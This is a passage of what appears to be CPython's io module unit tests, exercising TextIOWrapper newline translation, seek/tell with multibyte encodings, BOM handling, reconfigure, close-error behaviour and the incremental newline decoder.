"last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(support.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(support.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(support.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(support.TESTFN, "wb") as f: f.write(line*2) with self.open(support.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(support.TESTFN, "wb") as f: f.write(data) with self.open(support.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. # Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(support.TESTFN, 'wb') f.write(data) f.close() f = self.open(support.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(support.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(support.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(support.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), "BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(support.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(support.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(support.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with support.start_threads(threads, event.set): time.sleep(0.02) with self.open(support.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.read() t.tell() t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.write('x') t.tell() class MemviewBytesIO(io.BytesIO): '''A BytesIO object whose read method returns memoryviews rather than bytes''' def read1(self, len_): return _to_memoryview(super().read1(len_)) def read(self, len_): return _to_memoryview(super().read(len_)) def _to_memoryview(buf): '''Convert bytes-object *buf* to a non-trivial memoryview''' arr = array.array('i') idx = len(buf) - len(buf) % arr.itemsize arr.frombytes(buf[:idx]) return memoryview(arr) class CTextIOWrapperTest(TextIOWrapperTest): io = io shutdown_error = "LookupError: unknown encoding: ascii" def test_initialization(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') self.assertRaises(ValueError, t.read) t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) def test_garbage_collection(self): # C TextIOWrapper objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends in gc.garbage instead. with support.check_warnings(('', ResourceWarning)): rawio = io.FileIO(support.TESTFN, "wb") b = self.BufferedWriter(rawio) t = self.TextIOWrapper(b, encoding="ascii") t.write("456def") t.x = t wr = weakref.ref(t) del t support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"456def") def test_rwpair_cleared_before_textio(self): # Issue 13070: TextIOWrapper's finalization would crash when called # after the reference to the underlying BufferedRWPair's writer got # cleared by the GC. for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE def test_internal_buffer_size(self): # bpo-43260: TextIOWrapper's internal buffer should not store # data larger than chunk size. chunk_size = 8192 # default chunk size, updated later class MockIO(self.MockRawIO): def write(self, data): if len(data) > chunk_size: raise RuntimeError return super().write(data) buf = MockIO() t = self.TextIOWrapper(buf, encoding="ascii") chunk_size = t._CHUNK_SIZE t.write("abc") t.write("def") # default chunk size is 8192 bytes so t don't write data to buf. self.assertEqual([], buf._write_stack) with self.assertRaises(RuntimeError): t.write("x"*(chunk_size+1)) self.assertEqual([b"abcdef"], buf._write_stack) t.write("ghi") t.write("x"*chunk_size) self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack) class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): 